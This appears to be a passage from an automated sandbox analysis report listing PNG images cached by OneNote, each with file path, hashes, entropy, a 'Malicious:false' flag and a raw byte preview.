                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2232
                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002L.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13030
                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002M.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14458
                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002N.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1657
                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002O.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4847
                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002P.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002Q.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3879
                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002R.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002S.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3679
                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002T.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002U.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5386
                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002V.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000030.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13084
                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

